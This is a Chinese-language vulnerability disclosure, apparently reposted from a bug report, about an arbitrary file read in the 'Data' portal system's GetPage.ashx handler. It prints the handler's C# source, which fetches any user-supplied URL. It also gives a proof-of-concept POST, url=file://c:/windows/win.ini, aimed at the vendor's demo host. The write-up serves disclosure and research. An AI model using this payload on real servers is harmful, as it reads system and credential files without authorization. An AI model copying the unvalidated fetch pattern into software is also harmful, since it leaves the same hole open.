Data地方门户系统 任意文件读取 没穿底裤 714文章 0评论 2020年1月1日04:56:48评论371 views字数 727阅读2分25秒阅读模式 摘要地址主要源码如下如果url为file://url 就可以下载任意文件了(登陆可见是小编测试一下功能而已啦~嘿嘿~) 漏洞作者: hello 详细说明: 地址 http://demo.htmdata.com/ashx/GetPage.ashx 主要源码如下 public void ProcessRequest(HttpContext context) { context.Response.ContentType = "text/plain"; string s = ""; string requestUriString = Tool.CStr(context.Request["url"]); try { WebRequest request = WebRequest.Create(requestUriString); WebResponse response = request.GetResponse(); Stream responseStream = response.GetResponseStream(); using (StreamReader reader = new StreamReader(responseStream, Encoding.UTF8)) { s = reader.ReadToEnd(); } request.Abort(); response.Close(); responseStream.Dispose(); } catch (Exception) { } context.Response.Write(s); } 如果url为file://url 就可以下载任意文件了 漏洞证明: (登陆可见是小编测试一下功能而已啦~嘿嘿~) [dmengl2v] 漏洞证明 官网 访问 http://demo_htmdata_com/ashx/GetPage.ashx post提交 url=file://c:/windows/win.ini [/dmengl2v] 免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。 点赞 https://cn-sec.com/archives/76168.html 复制链接 复制链接 左青龙 微信扫一扫 右白虎 微信扫一扫
评论